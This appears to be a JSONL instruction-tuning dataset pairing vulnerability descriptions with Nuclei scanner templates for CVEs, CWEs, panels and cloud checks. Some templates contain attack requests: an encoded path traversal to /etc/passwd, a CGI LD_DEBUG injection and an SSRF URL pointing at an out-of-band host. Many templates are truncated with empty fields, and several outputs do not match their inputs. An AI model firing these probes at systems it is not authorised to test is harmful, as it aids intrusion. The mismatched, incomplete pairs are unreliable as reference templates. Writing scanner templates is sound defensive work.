{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: salon24\n\ninfo:\n name: Salon24 User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Salon24 user name information check was conducted.\n tags: osint,osint-blog,salon24,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.salon24.pl/u/{{user}}/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Strona g\u0142\u00f3wna\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template for: Generic Remote File Inclusion", "input": "Title: Generic Remote File Inclusion\nSummary: Generic Remote File Inclusion. Tags: rfi, dast, oast\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: generic-rfi\n\ninfo:\n name: Generic Remote File Inclusion\n author: m4lwhere\n severity: high\n description: Generic Remote File Inclusion\n tags: rfi,dast,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"NessusCodeExecTest\" \n part: body", "category": "generic", "severity": "high", "id": "generic-rfi"}
{"instruction": "Generate a Nuclei template for: Quip API Test", "input": "Title: Quip API Test\nSummary: Quip API Test. File Sharing and Storage for groups\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-quip\n\ninfo:\n name: Quip API Test\n author: daffainfo\n severity: info\n description: File Sharing and Storage for groups\n tags: token-spray,quip\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"id\":\" \n - \"\"name\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-quip"}
{"instruction": "Generate a Nuclei template for CVE-2014-1842", "input": "Title: Path Traversal in southrivertech titan_ftp_server\nSummary: Directory traversal vulnerability in the web interface in Titan FTP Server before 10.40 build 1829 allows remote attackers to list all usernames via a Go action with a .. (dot dot) in the search-bar value.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: southrivertech titan_ftp_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-1842\n\ninfo:\n name: Titan FTP Server Search Function < 10.40 - User Enumeration\n author: pussycat0x\n severity: medium\n description: Titan FTP Server versions prior to 10.40 build 1829 contain a directory traversal vulnerability in the web interface search functionality. Remote attackers can list all existing users by submitting \"/../\" in the search bar, enabling user enumeration and reconnaissance.\n tags: cve,cve2014,network,ftp,titan-ftp,tcp,passive,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2014-1842"}
{"instruction": "Generate a Nuclei template for CVE-2018-1207", "input": "Title: Code Injection in dell emc_idrac7 and others\nSummary: Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code.\nVulnerability Type: Code Injection\nSeverity: critical\nAffected Products: dell emc_idrac7, dell emc_idrac8\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-1207\n\ninfo:\n name: Dell iDRAC7/8 Devices - Remote Code Injection\n author: dwisiswant0\n severity: critical\n description: Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability\nwhich could be used to execute remote code. A remote unauthenticated attacker may\npotentially be able to use CGI variables to execute remote code.\n tags: cve2018,cve,dell,injection,rce,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/login?LD_DEBUG=files\" \n matchers:\n - type: word\n words:\n - \"calling init: /lib/\" \n part: response", "category": "cve", "severity": "critical", "id": "CVE-2018-1207"}
{"instruction": "Generate a Nuclei template for: Orbit Fox by ThemeIsle Detection", "input": "Title: Orbit Fox by ThemeIsle Detection\nSummary: Orbit Fox by ThemeIsle Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-themeisle-companion\n\ninfo:\n name: Orbit Fox by ThemeIsle Detection\n author: ricardomaia\n severity: info\n description: Orbit Fox by ThemeIsle Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/themeisle-companion/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-themeisle-companion"}
{"instruction": "Generate a Nuclei template for CVE-2021-44228", "input": "Title: Vulnerability (CWE-20) in siemens 6bk1602-0aa12-0tp0_firmware and others\nSummary: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\nVulnerability Type: Vulnerability (CWE-20)\nSeverity: critical\nAffected Products: siemens 6bk1602-0aa12-0tp0_firmware, siemens 6bk1602-0aa22-0tp0_firmware, siemens 6bk1602-0aa32-0tp0_firmware\nIndicators: error, vulnerability detected", "output": "id: vmware-hcx-log4j-rce\n\ninfo:\n name: VMware HCX - Remote Code Execution (Apache Log4j)\n author: pussycat0x,DhiyaneshDK\n severity: critical\n description: VMware HCX is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: regex\n part: interactsh_request", "category": "cve", "severity": "critical", "id": "CVE-2021-44228"}
{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: resumes-actorsaccess\n\ninfo:\n name: Resumes actorsaccess User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Resumes actorsaccess user name information check was conducted.\n tags: osint,osint-social,resumes-actorsaccess,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://resumes.actorsaccess.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"- Resume | Actors Access\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template for CVE-2021-3374", "input": "Title: Path Traversal in rstudio shiny_server\nSummary: Directory traversal in RStudio Shiny Server before 1.5.16 allows attackers to read the application source code, involving an encoded slash.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: rstudio shiny_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-3374\n\ninfo:\n name: Rstudio Shiny Server <1.5.16 - Local File Inclusion\n author: geeknik\n severity: medium\n description: Rstudio Shiny Server prior to 1.5.16 is vulnerable to local file inclusion and source code leakage. This can be exploited by appending an encoded slash to the URL.\n tags: cve2021,cve,rstudio,traversal,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%2f/\" \n - \"{{BaseURL}}/sample-apps/hello/%2f/\" \n matchers:\n - type: word\n words:\n - \"Index of /\" \n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-3374"}
{"instruction": "Generate a Nuclei template for: Log Planner Stats Enabled in PostgreSQL Database Instances", "input": "Title: Log Planner Stats Enabled in PostgreSQL Database Instances\nSummary: Log Planner Stats Enabled in PostgreSQL Database Instances. Ensure that the log_planner_stats database flag is disabled for your Google Cloud PostgreSQL database instances in order to avoid performance issues caused by excessive logging. The log_planner_stats flag controls the inclusion of PostgreSQL planner performance statistics in the PostgreSQL logs for each query.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-pg-log-planner-stats-enabled\n\ninfo:\n name: Log Planner Stats Enabled in PostgreSQL Database Instances\n author: princechaddha\n severity: medium\n description: Ensure that the log_planner_stats database flag is disabled for your Google Cloud PostgreSQL database instances in order to avoid performance issues caused by excessive logging. The log_planner_stats flag controls the inclusion of PostgreSQL planner performance statistics in the PostgreSQL logs for each query.\n tags: cloud,devops,gcp,gcloud,google-cloud-sql,postgresql,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-pg-log-planner-stats-enabled"}
{"instruction": "Generate a Nuclei template for: Uberflip Takeover Detection", "input": "Title: Uberflip Takeover Detection\nSummary: Uberflip Takeover Detection. Uberflip takeover was detected.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: uberflip-takeover\n\ninfo:\n name: Uberflip Takeover Detection\n author: pdteam\n severity: high\n description: Uberflip takeover was detected.\n tags: takeover,uberflip,hackerone,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n - type: word\n words:\n - \"Non-hub domain, The URL you've accessed does not provide a hub.\"", "category": "generic", "severity": "high", "id": "uberflip-takeover"}
{"instruction": "Generate a Nuclei template for CVE-2023-47246", "input": "Title: Path Traversal in sysaid sysaid\nSummary: In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\nVulnerability Type: Path Traversal\nSeverity: critical\nAffected Products: sysaid sysaid\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-47246\n\ninfo:\n name: SysAid Server - Remote Code Execution\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n tags: cve,cve2023,sysaid,rce,kev,traversal,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl", "category": "cve", "severity": "critical", "id": "CVE-2023-47246"}
{"instruction": "Generate a Nuclei template for: WordPress Importer Detection", "input": "Title: WordPress Importer Detection\nSummary: WordPress Importer Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-wordpress-importer\n\ninfo:\n name: WordPress Importer Detection\n author: ricardomaia\n severity: info\n description: WordPress Importer Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wordpress-importer/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-wordpress-importer"}
{"instruction": "Generate a Nuclei template for: Wordpress - Path Disclosure", "input": "Title: Wordpress - Path Disclosure\nSummary: Wordpress - Path Disclosure. Wordpress internal file system path of a WordPress installation is exposed or disclosed to unauthorized users.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wp-full-path-disclosure\n\ninfo:\n name: Wordpress - Path Disclosure\n author: arcc\n severity: info\n description: Wordpress internal file system path of a WordPress installation is exposed or disclosed to unauthorized users.\n tags: debug,wordpress,fpd,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-includes/rss-functions.php\" \n matchers:\n - type: word\n words:\n - \"Call to undefined function _deprecated_file()\" \n part: body", "category": "generic", "severity": "info", "id": "wp-full-path-disclosure"}
{"instruction": "Generate a Nuclei template for: Use AWS-managed policy to access Amazon ECR Repositories", "input": "Title: Use AWS-managed policy to access Amazon ECR Repositories\nSummary: Use AWS-managed policy to access Amazon ECR Repositories. Ensure that all EKS cluster node groups use the \"AmazonEC2ContainerRegistryReadOnly\" managed policy to access Amazon ECR repositories. This policy provides read-only access to Amazon EC2 Container Registry (ECR) repositories.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: eks-managed-policy-ecr-access\n\ninfo:\n name: Use AWS-managed policy to access Amazon ECR Repositories\n author: princechaddha\n severity: high\n description: Ensure that all EKS cluster node groups use the \"AmazonEC2ContainerRegistryReadOnly\" managed policy to access Amazon ECR repositories. This policy provides read-only access to Amazon EC2 Container Registry (ECR) repositories.\n tags: cloud,devops,aws,amazon,eks,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "eks-managed-policy-ecr-access"}
{"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: stackstorm-default-login\n\ninfo:\n name: StackStorm Default Login\n author: PaperPen\n severity: high\n description: A StackStorm default admin login was discovered.\n tags: stackstorm,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"user\":\" \n - \"\"token\":\" \n - \"\"expiry\":\" \n condition: and\n - type: status\n status:\n - 201", "category": "cwe", "severity": "medium", "id": "CWE-522"}
{"instruction": "Generate a Nuclei template for: Azure App Service TLS Latest Version Not Configured", "input": "Title: Azure App Service TLS Latest Version Not Configured\nSummary: Azure App Service TLS Latest Version Not Configured. Ensure that all Microsoft Azure App Service web applications are using the latest version of TLS encryption protocol to secure the applications traffic over the Internet and comply with the industry standards. This check verifies if the minimum TLS version configured is not \"1.2\", indicating that the latest version of TLS is not used.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: azure-appservice-tls-latest-version-missing\n\ninfo:\n name: Azure App Service TLS Latest Version Not Configured\n author: princechaddha\n severity: medium\n description: Ensure that all Microsoft Azure App Service web applications are using the latest version of TLS encryption protocol to secure the applications traffic over the Internet and comply with the industry standards. This check verifies if the minimum TLS version configured is not \"1.2\", indicating that the latest version of TLS is not used.\n tags: cloud,devops,azure,microsoft,appservice,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "azure-appservice-tls-latest-version-missing"}
{"instruction": "Generate a Nuclei template for CVE-2021-25297", "input": "Title: OS Command Injection in nagios nagios_xi\nSummary: Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.\nVulnerability Type: OS Command Injection\nSeverity: high\nAffected Products: nagios nagios_xi\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-25297\n\ninfo:\n name: Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection\n author: k0pak4\n severity: high\n description: Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"Ping\" \n - \"Switch Details\" \n part: body_4\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2021-25297"}
{"instruction": "Generate a Nuclei template to detect Command Injection", "input": "Title: Command Injection (CWE-77)\nSummary: The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. Many protocols and products have their own custom command language. While OS or shell command strings are frequently discovered and targeted, developers may not realize that these other command languages might also be vulnerable to attac\nVulnerability Type: Command Injection\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: php-zerodium-backdoor-rce\n\ninfo:\n name: PHP 8.1.0-dev - Backdoor Remote Code Execution\n author: dhiyaneshDk\n severity: critical\n description: PHP 8.1.0-dev contains a backdoor dubbed 'zerodiumvar_dump' which can allow the execution of arbitrary PHP code.\n tags: php,backdoor,rce,zerodium,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"int(77777355556)\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-77"}
{"instruction": "Generate a Nuclei template for CVE-2022-27849", "input": "Title: Information Disclosure in plugin-planet simple_ajax_chat\nSummary: Sensitive Information Disclosure (sac-export.csv) in Simple Ajax Chat (WordPress plugin) <= 20220115\nVulnerability Type: Information Disclosure\nSeverity: medium\nAffected Products: plugin-planet simple_ajax_chat\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-27849\n\ninfo:\n name: WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability\n author: random-robbie\n severity: high\n description: WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it.\n tags: cve,cve2022,wp,wordpress,wp-plugin,disclosure,plugin-planet,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv\" \n matchers:\n - type: word\n words:\n - \"\"Chat Log\"\" \n - \"\"User IP\"\" \n - \"\"User ID\"\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/csv\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-27849"}
{"instruction": "Generate a Nuclei template for: T-Pot Honeypot - Detect", "input": "Title: T-Pot Honeypot - Detect\nSummary: T-Pot Honeypot - Detect. A tpot dashboard has been detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: tpot-honeypot-detect\n\ninfo:\n name: T-Pot Honeypot - Detect\n author: rxerium\n severity: info\n description: A tpot dashboard has been detected\n tags: tpot,honeypot,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"T-Pot\" \n - \"T-Pot @ Github\" \n - \"T-Pot ReadMe\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "tpot-honeypot-detect"}
{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: qmail-admin-login\n\ninfo:\n name: QmailAdmin Login Panel - Detect\n author: ritikchaddha\n severity: info\n description: QmailAdmin login panel was detected.\n tags: qmail,panel,qmail_project,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/qmailadmin/qmailadmin.cgi\" \n - \"{{BaseURL}}/cgi-bin/qmailadmin/qmailadmin\" \n - \"{{BaseURL}}/cgi-bin/qmailadmin\" \n - \"{{BaseURL}}/cgi-ssl/qmailadmin/qmailadmin\" \n matchers:\n - type: word\n words:\n - \"QmailAdmin\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: cisco-webvpn-detect\n\ninfo:\n name: Cisco WebVPN Panel - Detect\n author: ricardomaia\n severity: info\n description: Cisco WebVPN panel was detected.\n tags: panel,cisco,vpn,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/webvpn.html\" \n matchers:\n - type: word\n words:\n - \"CISCO\" \n - \"AnyConnect\" \n - \"SSLVPN Service\" \n part: body\n condition: or\n - type: regex\n part: header\n condition: or", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template for CVE-2022-24260", "input": "Title: SQL Injection in voipmonitor voipmonitor\nSummary: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: voipmonitor voipmonitor\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-24260\n\ninfo:\n name: VoipMonitor - Pre-Auth SQL Injection\n author: gy741\n severity: critical\n description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.\n tags: cve,cve2022,voipmonitor,sqli,unauth,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"success\":true\" \n - \"_vm_version\" \n - \"_debug\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2022-24260"}
{"instruction": "Generate a Nuclei template for: aws-ecs-container-agent-tasks", "input": "Title: aws-ecs-container-agent-tasks\nSummary: aws-ecs-container-agent-tasks. Aws container metadata content\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: aws-ecs-container-agent-tasks\n\ninfo:\n name: aws-ecs-container-agent-tasks\n author: dogasantos\n severity: info\n description: Aws container metadata content\n tags: miscellaneous,aws,docker,ec2,misc,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/v1/metadata\" \n - \"{{BaseURL}}/v1/tasks\" \n matchers:\n - type: word\n words:\n - \"arn:aws:ecs\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "aws-ecs-container-agent-tasks"}
{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Amazon Media", "input": "Title: Content-Security-Policy Bypass - Amazon Media\nSummary: Content-Security-Policy Bypass - Amazon Media. Tags: xss, csp-bypass, amazon-media\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: amazon-media-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Amazon Media\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Amazon Media\n tags: xss,csp-bypass,amazon-media,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"amazon.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "amazon-media-csp-bypass"}
{"instruction": "Generate a Nuclei template for: IRISNext Login Panel - Detect", "input": "Title: IRISNext Login Panel - Detect\nSummary: IRISNext Login Panel - Detect. IRISNext products was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: irisnext-panel\n\ninfo:\n name: IRISNext Login Panel - Detect\n author: righettod\n severity: info\n description: IRISNext products was detected.\n tags: panel,irisnext,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dblang.dcw\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "irisnext-panel"}
{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: dibiz\n\ninfo:\n name: DIBIZ User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: DIBIZ user name information check was conducted.\n tags: osint,osint-business,dibiz,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.dibiz.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"mailto:?subject=\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template for CVE-2025-24354", "input": "Title: Vulnerability (CWE-918) in CVE-2025-24354\nSummary: imgproxy is server for resizing, processing, and converting images. Imgproxy does not block the 0.0.0.0 address, even with IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES set to false. This can expose services on the local host. This vulnerability is fixed in 3.27.2.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: medium\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-24354\n\ninfo:\n name: Imgproxy < 3.27.2 - Server-Side Request Forgery (SSRF)\n author: oksuzkayra\n severity: medium\n description: imgproxy contains an issue caused by not blocking the 0.0.0.0 address even when IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES is set to false, letting local services be exposed, exploit requires network access.\n tags: cve,cve2025,imgproxy,ssrf,oast,oob\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/unsafe/plain/http://{{interactsh-url}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2025-24354"}
{"instruction": "Generate a Nuclei template for: ProFTPD Server Detect", "input": "Title: ProFTPD Server Detect\nSummary: ProFTPD Server Detect. The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: proftpd-server-detect\n\ninfo:\n name: ProFTPD Server Detect\n author: pussycat0x\n severity: info\n description: The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.\n tags: network,ftp,proftpd,detect,detection,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "proftpd-server-detect"}
{"instruction": "Generate a Nuclei template for: aliexpress phishing Detection", "input": "Title: aliexpress phishing Detection\nSummary: aliexpress phishing Detection. An aliexpress phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: aliexpress-phish\n\ninfo:\n name: aliexpress phishing Detection\n author: rxerium\n severity: info\n description: An aliexpress phishing website was detected\n tags: phishing,aliexpress,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"AliExpress - Affordable Prices on Top Brands with Free Shipping\" \n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "aliexpress-phish"}
{"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: digitalrebar-traversal\n\ninfo:\n name: Digital Rebar - Local File Inclusion\n author: c-sh0\n severity: high\n description: Digital Rebar versions 4.3.0, 4.3.2, 4.3.3, 4.4.0, and maybe others are vulnerable to local file inclusion because web requests can navigate outside of DRP controlled areas.\n tags: lfi,rackn,digitalrebar,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\" \n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"X-Drp-Sha256sum:\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"}
